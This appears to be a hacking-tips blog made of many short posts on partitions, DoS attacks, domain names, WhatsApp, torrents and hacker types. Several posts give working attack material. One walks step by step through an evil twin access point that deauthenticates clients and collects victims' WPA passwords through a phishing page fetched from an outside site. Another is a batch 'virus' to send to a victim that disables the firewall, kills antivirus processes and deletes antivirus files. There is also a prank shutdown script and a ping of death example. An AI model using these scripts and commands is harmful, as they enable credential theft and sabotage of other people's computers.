How to hide partitions in windows using cmd

How to hide partitions in windows using cmd


    Some times we want to hide our personal data to other for                security reason. Today i am gonna tell you how to hide our data    to other without using third party software. you can easily done   it  by hiding entire partition using CMD....................


1.open command prompt (by press win+r  here type in run cmd enter)                                                                                                                                                             2.Now in cmd type DISKPART  then hit enter                                                                                                                                                                                                               3.Now type list volume enter  (to see all the partition in your system  )                                                                                                                                                                  4.Now important part of this procedure selection of volume which drive you want hide from the main image  you can see every partition assign by some letters and numbers so to hide particular drive (suppose you want hide drive D and drive D assign by number 5) type select volume 5 hit enter. Now drive (partition 5 selected )                                                                                                                                                                                                                                                                  5.Now next thing you have to do hide or remove assign letter of selected drive/partition . Type remove letter D hit enter. here letter D is the drive letter that you have to hide.Now your drive hidden for other some times it need restart so reboot your system and enjoy..........................................................                                                                                                                                                               6.But now problem is if once you hide drive then how you access your hidden drive so don't worry just repeat this procedure up to step 4 and then replace command Remove letter D to assign letter D that sit

what is DoS(denial- of service) attack

what is DoS(denial- of service) attack  



                                  what is DoS(denial-of service) attack???

A denial-of-service (DoS) is any type of attack where the attackers (hackers) attempt to prevent legitimate users from accessing the service. In a DoS attack, the attacker usually sends excessive messages asking the network or server to authenticate requests that have invalid return addresses. The network or server will not be able to find the return address of the attacker when sending the authentication approval, causing the server to wait before closing the connection. When the server closes the connection, the attacker sends more authentication messages with invalid return addresses. Hence, the process of authentication and server wait will begin again, keeping the network or server busy.                                                                                                                                                                There are several different kinds of dos attacks as discussed below:                                                                                                                                                                                                                                                                                        
1. Teardrop Attack :- Whenever data is sent over the internet, it is broken into fragments at the source system and reassembled at the destination system. For example you need to send 3,000 bytes of data from one system to another. Rather than sending the entire chunk in asingle packet, the data is broken down into smaller packets as given below:
* packet 1 will carry bytes 1-1000.
* packet 2 will carry bytes 1001-2000.
* packet 3 will carry bytes 2001-3000.
In teardrop attack, however, the data packets sent to the target computer contais bytes that overlaps with each other.
(bytes 1-1500) (bytes 1001-2000) (bytes 1500-2500)
When the target system receives such a series of packets, it can not reassemble the data and therefore will crash, hang, or reboot.
Old Linux systems, Windows NT/95 are vulnerable.

2. SYN - Flood Attack :- In SYN flooding attack, several SYN packets are sent to the target host, all with an invalid source IP address. When the target system receives these SYN packets, it tries to respond to each one with a SYN/ACK packet but as all the source IP addresses are invalid the target system goes into wait state for ACK message to receive from source. Eventually, due to large number of connection requests, the target systems' memory is consumed. In order to actually affect the target system, a large number of SYN packets with invalid IP addresses must be sent.

3. Land Attack :- A land attack is similar to SYN attack, the only difference being that instead of including an invalid IP address, the SYN packet include the IP address of the target sysetm itself. As a result an infinite loop is created within the target system, which ultimately hangs and crashes.Windows NT before Service Pack 4 are vulnerable to this attack.

4. Smurf Attack :- There are 3 players in the smurf attack–the attacker,the intermediary (which can also be a victim) and the victim. In most scenarios the attacker spoofs the IP source address as the IP of the intended victim to the intermediary network broadcast address. Every host on the intermediary network replies, flooding the victim and the intermediary network with network traffic.                                                                                                         
               5. Ping Of Death :-  The ping of death attack sends oversized ICMP datagrams (encapsulated in IP packets) to the victim.The Ping command makes use of the ICMP echo request and echo reply messages and it's commonly used to determine whether the remote host is alive. In a ping of death attack, however, ping causes the remote system to hang, reboot or crash. To do so the attacker uses, the ping command in conjuction with -l argument (used to specify the size of the packet sent) to ping the target system that exceeds the maximum bytes allowed by TCP/IP (65,536).
example:- c:/>ping -l 65540 hostname
Fortunately, nearly all operating systems these days are not vulnerable to the ping of death attack.


Top Facts About Domain Names You Must Know

Top Facts About Domain Names You Must Know




Top Facts About Domain Names You Must Know 


.com Truncated from the word “commercial,” this TLD was initially controlled by the US Department of Defense.
The domain was originally administered by the United States Department of Defense, but is today operated by Verisign, and remains under ultimate jurisdiction of U.S.
 At present, it is being managed by VeriSign. It was intended for commercial entities and in 1995, the NSF or National Science Foundation, which is responsible for its maintenance, started selling the domain for an annual fee ranging from $50-$100. The commercial distinction quickly became irrelevant though ever since registration for .com (and also .org and .net) soon became unrestricted. 

The very first registered .com domain was Symbolics.com (on  15 March , 1985).

.org – It is known as the first generic TLD and was truncated from “organization.” Like .com it was created to distinguish non-defense interests, except that .org was intended for non-profit entities, such as Greenpeace.org. Nevertheless, the PIR or Public Interest Registry—which manages the domain—currently charges $7.70 per domain name registered.


.mil – This is the domain reserved for the United States Department of Defense. It is short for “military.” The Department still makes use of .com and .edu for its recruitment, general information, and service academies websites, though.

.net – This is another generic TLD. “.Net” was intended for organizations involved in networking technologies. Many believe that a .net is not "brandable" and should not be used to build an online business. But take the example of Oversee.net, one of the most successful domain buying/selling company, founded by a very young entrepreneur, Lawrence Ng. 

Interesting facts:
  • .net is also currently managed by VeriSign.
  • The oldest and still existing .net domain is Nordu.net.







.edu–  
"edu" is one of the top-level domain names that can be used when choosing a domain name. It generally describes the entity owning the domain name as a four-year college or similar educational institution. (Educational institutions below four-year colleges are encouraged to use the geographic "us" top-level domain name.) Along with the second-level domain name (for example: "umich" in umich.edu), the top-level domain name is required in Web and e-mail addresses.
.edu is a sponsored TLD. It was—and still is—designated for four-year, post-secondary educational institutions (colleges and universities). It used to be available to educational institutions from anywhere in the world, but since the majority are using country-level domains, .edu became exclusive for US-accredited post-secondary schools since 2001.

.gov – This is another sponsored TLD, but is restricted for US government use only. Other countries include country code TLDs or second-level domains (SLDs) to their government URLs for easy distinction.

Speaking of country code TLDs (ccTLDs), assigning two-letter characters to signify the country source started 1985 with .uk, .us and .il. Eight more were added in 1986. However, it wasn’t until 2010 when the IANA or Internet Assigned Numbers Authority widely implemented the ccTLDs. Obviously they are exclusive to the country of origin, and the characters or alphabets used are native to the country of origin as well.

Today, these domains are widely used along with a simple, memorable, and often personalized domain name. Anyone interested in creating a website with a personalized domain simply need to contact domain services and purchase the rights to a unique—and preferably monetizable—domain name.

How to Create Evil Twin Access Point

How to Create Evil Twin Access Point



What is Evil twin access point:-

An evil twin, in security, is a rogue wireless access point that act as a Wi-Fi access point so that an attacker can gather personal information without the user's knowledge.
To the user, the evil twin looks like a hot-spot with a strong signal; that's because the attacker has not only used the same network name and settings as the "good twin" he is impersonating, he has also physically positioned himself near the end-user so that his signal is likely to be the strongest within range.
If the end-user is tempted by the strong signal and connects manually to the evil twin to access the Internet, or if the user's computer automatically chooses that connection because it is running in promiscuous mode, the evil twin becomes the user's Internet access point, giving the attacker the ability to intercept sensitive data such as passwords.


Requirements:

1.  Linux(kali)
2. Wireless network adapter
3.  Internet connection to your system
4. Target Access point
1.Open the terminal and type apt-get install dhcp3-server as show below: 2.Open your terminal and type nano/etc/dhcpd.conf, you should have a blank file opened up on your terminal..                                                                             3.Now download the security update page which the client will see when they open up the web browser..
To do that,
Navigate to, cd /var/www in your terminal and do as follows:
rm index.html
wget http://hackthistv.com/eviltwin.zip
unzip eviltwin.zip
rm eviltwin.zip                                                                                                             4.Now type the following to start your apache server and mysql:
 /etc/init.d/apache2 start
/etc/init.d/mysql start                                                                                                                                                                                                                                                           Now the mysql is loaded now we have to create a database where we store the WPA/WPA2 password that the client enters into the security update page..
Type the follows:
       mysql -u root
       create database evil_twin;
       use evil_twin

   now leave the terminal                                                                                                         5.Now we need to find our local network adapter interface name and our local ip
Now open the new terminal and type:
ip route (take note of local ip n wired interface)
airmon-ng
airmon-ng start wlan0
clear                                                                                                                                    6. airodump-ng-oui-update

7. airodump-ng -M mon0 (take note of target essid,bssid and channel number)

airbase-ng -e [ESSID] -c [ch. #] -P mon0

NOTE: [ESSID]  is your targets ESSID and [ch. #] targets channel no.

8 Now open a new terminal and type as follows:

     ifconfig at0 192.168.1.129 netmask 255.255.255.128

9 type the following:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

iptables –append FORWARD –in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

etc/init.d/isc-dhcp-server start

10 Now we need to force our clients to connect to our evil twin access point and to accomplish this we need to disconnect the clients by performing the de-authentication attack. 

echo [BSSID] > blacklist

NOTE:[BSSID] BSSID of the target

mdk3 mon0 d -b blacklist -c [CH.#]

11 Now go back to airbase terminal to check if any client has connected to your evil twin access point.. 

12 Now go over to the mysql terminal and type

 use evil_twin

select * from wpa_keys; {To view the password entered by the victim in our mysql database}


How to Use Whatsapp Free For Life Time

How to Use Whatsapp Free For Life Time


As we know that now-a-days whatsapp became most popular messenger app. It is a cross-platform mobile messaging app which allows you to exchange messages without having to pay for text message(SMS),not even you can exchange text only you can exchange images,video,audio as well..........................................

Note :- if your trial version is finished, or you want to extend it for a year then you can uninstall it otherwise don't uninstall wait for your trial version finish ,if finish then follow the blew steps  


1.uninstall expire version of whats app                                                                                                                                                                                                                         2.Go to gmail application create new account in your phone once it finished(normally it will take time it depend on your internet speed may be 10-20 minute)                                                                                                                                                                                                                                                                         3.After creation of id go to google play store CLICK on s menu button of your android phone now choose account setting...................................................                                                                                                                                                           4. Once you have done this,you just need to choose the new gmail account, you just created, and download whatsapp once again.                                                                                                                                                                                                  5.Now open whatsapp, and sign into your whatsapp account                                                                                                                                                                                     6. Now You Can use whatsapp free for lifetime.                                                             so enjoy...........................................................................................................



How to remove shortcut virus from system/pendrive

How to remove shortcut virus from system/pendrive



What is shortcut virus:-                                                                                              a shortcut virus is a virus (a malware) that hides your original files inside shortcuts.The way it hides the file remains unknown though the effect is quite visible. The original files are there in the drive itself, but in such a position that you can’t recognize it nor take it out (in the advanced stage).Initially, it doesn’t harms your files but later on, it may make them corrupt or even delete all the files; depends on the type of shortcut virus.

How to remove it:-                                                                                                        1.open command prompt(run as administrator)                                               2.Now type in command prompt attrib -h -r -s /s /d(your system or pendrive letter) example :attrib -h -r -s /s /d D:\*.*  hit enter                                                                
                                                                                                                                                                                                                                                                                                 now enjoy shortcut virus has removed from  your pen drive   or system                

how to create prank virus

Warning:- Do on your own risk, i am not responsible for any damage 
 how to create  prank virus


Today i am gonna tell how to create prank virus for fun. For few time it will get frustrated you or your friend (in which system you going to run it).So what to do to create this virus just follow the steps...................................................................................................                                                                                                                                                 1.open notepad                                                                                                             2.save it as .bat (for example v.bat)                                                                    3.now send it to your friend  


cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep
echo Wscript.Sleep 5000>C:sleep5000.vbs
echo Wscript.Sleep 3000>C:sleep3000.vbs
echo Wscript.Sleep 4000>C:sleep4000.vbs
echo Wscript.Sleep 2000>C:sleep2000.vbs
cd %systemroot%System32
dir
cls
start /w wscript.exe C:sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:sleep3000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Deleting Root Partition…
start /w wscript.exe C:sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x…
cd C:Documents and SettingsAll UsersStart MenuPrograms
mkdir h4x
start /w wscript.exe C:sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1…
start /w wscript.exe C:sleep3000.vbs
echo cd C:Documents and SettingsAll UsersStart MenuProgramsStartuph4x
echo start hax.exe
start /w wscript.exe C:sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:sleep2000.vbs
pause
shutdown -s -t 10 -c “Your computer has crashed,Ram has crashed,motherboard also crashed. Have a nice day.”

Types of hacker

Types of hacker


Most of  peoples not acquainted with types  hacker.So   Today i am gonna tell you Types of hacker and  their responsibilities............... as we know that hacker are the most intelligent people or programmer ,means we can say that to be a good hacker you must be good programmer


  • Types of Hacker

  •  White Hat Hacker                                                                                                                                        A white hat hacker breaks security for non-malicious reasons, for instance testing their own security system. This type of hacker enjoys learning and working with computer systems, and consequently gains a deeper understanding of the subject. Such people normally go on to use their hacking skills in legitimate ways, such as becoming security consultants. The word 'hacker' originally included people like this, although a hacker may not be someone into security.


  • Grey Hat Hacker                                                                                                A grey hat hacker is a hacker of ambiguous ethics and/or borderline legality, often frankly admitted. According to one definition of a grey-hat hacker, when they discover a vulnerability, instead of telling the vendor how the exploit works, he or she may offer to repair it for a small fee. When one successfully gains illegal access to a system or network, he or she may suggest to the system administrator that one of his or her friends be hired to fix the problem; however, this practice has been declining due to the increasing willingness of businesses to prosecute. Another definition of Grey Hat maintains that Grey Hat hackers only arguably violate the law in an effort to research and improve security


  •  Black Hat Hacker                                                                                             A black hat hacker is someone who breaks computer security without authorization or uses technology (usually a computer, phone system or network) for vandalism, credit card fraud, identity theft, piracy, or other types of illegal activity. Black hat hackers are also referred to as the "crackers" within the security industry and by modern programmers. Crackers keep the awareness of the vulnerabilities to themselves and do not notify the general public or the manufacturer for patches to be applied. Individual freedom and accessibility is promoted over privacy and security. Once they have gained control over a system, they may apply patches or fixes to the system only to keep their reigning control. 




  • Script kiddie                                                                                                        A script kiddie is a non-expert who breaks into computer systems by using pre-packaged automated tools written by others, usually with little understanding. These are the outcasts of the hacker community. It is generally assumed that script kiddies are juveniles who lack the ability to write sophisticated programs or exploits on their own and that their objective is to try to impress their friends or gain credit in computer-enthusiast communities

How to crack Windows7 password

How to crack Windows7 password

Some times we forget our windows password and in case we don't want to format system or reinstall window then, what you will do,how recover or reset window password. So guys not to worry about it. Today i gonna tell you how to reset our window password without using any third party software............................................. Just follow the following steps:---------------------------------------------------

  • First of all restart your system then

  •  Press key(F8. DEL ,F5,) to enter in advance boot options


  • Now choose 'Safe Mode with Command Prompt' enter


  • Wait for Windows 7 files loading until Windows login screen comes up. 


  •  Log in Windows with an administrator account until you see login screen.

  •  Now A Command Prompt appears. Type net user in the Command Prompt and then hit Enter. This command will be listed All Windows user accounts  for you. 


  • Type net user hackerzone 123456 and hit Enter. 


  • your password password has been successfully reset for user when the command is completed successfully. 


  • Now hackerzone is your user name and 123456 is your account user name you can change both after login window thanku..........................................


  •  enjjjjjjjjjjjjoyyyyyyyyyyyyyyyyyy.....................................................................................



How Watch torrent videos online without downloading

How Watch torrent videos online without downloading
Torrent is one of the most popular tool for downloading movies and other videos.  Some of the torrents come with sample video quality where you can check video quality, and download it, if it satisfies you. 
But what about rest?? I mean those torrents that don not come with any sample! How will you identify between fake and genuine torrent. For that I'm going to give you a small trick that works well in Chrome, Firefox and Opera.
TS(Torrent Stream) magic plays torrents online in the original quality without downloading.It works same as torrent,based on number of peers connected to us.If the peers are more and internet connection is good streaming will be fast.Or we can stream it for some time to check quality of the video,if the quality is good we can download that film or video using utorrent.
Downloading TS magic player:
  • Download and install TS magic player from http://torrentstream.org/
  • Now install browser plug in
  • Open torrent URL
  • Now you will see an option to play online
  • If not then right click on "Download torrent link" and select "View Torrent Online"

how to use your cell phone as a remote

how to use your cell phone as a remote

By using this trick we can handle our desktop or laptop by using cell phone. means you can use your cell phone as a remote......................
what you needed for this trick:

  •  check bluetooth is in your system or not if not then you can purchase it and plugin i n your system
  •  cell phone(Nokia,samsung etc)
  • pc suite(software for your system) to connect your cellphon 
Now follow the following steps:-
1. download MWREMOTECTRL
2.Install it in your system and then
3. after installation a file will be genrate(mwremotectrl.jar)
4.save it in your mobile and then run (before Running this application on cellphone also run mwremotectrl on your system that was install by you ) 

how to Disable others antivirus (Virus)

 I am not responsible for any damage or error reporting in Your system so do  it an your own risk. following code  only for knowledge concept .....................
how to Disable others antivirus (Virus)
This code will help you to make virus to disable the others antivirus so follow the step

  • open notepad(win+r type notepad in run Enter)
  • And then copy below code in notepad and save it as .bat file 
  • for example virus.bat
  • And then send it to others(victim computer)computer
  • remember one thing don't double click on your on system otherwise it will also affect your system so carefully send the victim by pen drive or any other media



@ echo offrem --rem Permanently Kill Anti-Virusnet stop “Security Center”netsh firewall set opmode mode=disabletskill /A av*tskill /A fire*tskill /A anti*clstskill /A spy*tskill /A bullguardtskill /A PersFwtskill /A KAV*tskill /A ZONEALARMtskill /A SAFEWEBclstskill /A OUTPOSTtskill /A nv*tskill /A nav*tskill /A F-*tskill /A ESAFEtskill /A cleclstskill /A BLACKICEtskill /A def*tskill /A kavtskill /A kav*tskill /A avg*tskill /A ash*clstskill /A aswupdsvtskill /A ewid*tskill /A guard*tskill /A guar*tskill /A gcasDt*tskill /A msmp*clstskill /A mcafe*tskill /A mghtmltskill /A msiexectskill /A outposttskill /A isafetskill /A zap*clstskill /A zauinsttskill /A upd*tskill /A zlclien*tskill /A minilogtskill /A cc*tskill /A norton*clstskill /A norton au*tskill /A ccc*tskill /A npfmn*tskill /A loge*tskill /A nisum*tskill /A issvctskill /A tmp*clstskill /A tmn*tskill /A pcc*tskill /A cpd*tskill /A pop*tskill /A pav*tskill /A padminclstskill /A panda*tskill /A avsch*tskill /A sche*tskill /A syman*tskill /A virus*tskill /A realm*clstskill /A sweep*tskill /A scan*tskill /A ad-*tskill /A safe*tskill /A avas*tskill /A norm*clstskill /A offg*del /Q /F C:\Program Files\alwils~1\avast4\*.*del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exedel /Q /F C:\Program Files\kasper~1\*.execlsdel /Q /F C:\Program Files\trojan~1\*.exedel /Q /F C:\Program Files\f-prot95\*.dlldel /Q /F C:\Program Files\tbav\*.datclsdel /Q /F C:\Program Files\avpersonal\*.vdfdel /Q /F C:\Program Files\Norton~1\*.cntdel /Q /F C:\Program Files\Mcafee\*.*clsdel /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*del /Q /F C:\Program Files\Norton~1\Norton~1\*.*del /Q /F C:\Program Files\Norton~1\*.*clsdel /Q /F C:\Program Files\avgamsr\*.exedel /Q /F C:\Program Files\avgamsvr\*.exedel /Q /F C:\Program Files\avgemc\*.execlsdel /Q /F C:\Program Files\avgcc\*.exedel /Q /F C:\Program Files\avgupsvc\*.exedel /Q /F C:\Program Files\grisoftdel /Q /F C:\Program Files\nood32krn\*.exedel /Q /F C:\Program Files\nood32\*.execlsdel /Q /F C:\Program Files\nod32del /Q /F C:\Program Files\nood32del /Q /F C:\Program Files\kav\*.exedel /Q /F C:\Program Files\kavmm\*.exedel /Q /F C:\Program Files\kaspersky\*.*clsdel /Q /F C:\Program Files\ewidoctrl\*.exedel /Q /F C:\Program Files\guard\*.exedel /Q /F C:\Program Files\ewido\*.execlsdel /Q /F C:\Program Files\pavprsrv\*.exedel /Q /F C:\Program Files\pavprot\*.exedel /Q /F C:\Program Files\avengine\*.execlsdel /Q /F C:\Program Files\apvxdwin\*.exedel /Q /F C:\Program Files\webproxy\*.exedel /Q /F C:\Program Files\panda software\*.*rem --

enjoy......................................................................................................

Blogger Tips and TricksLatest Tips For BloggersBlogger Tricks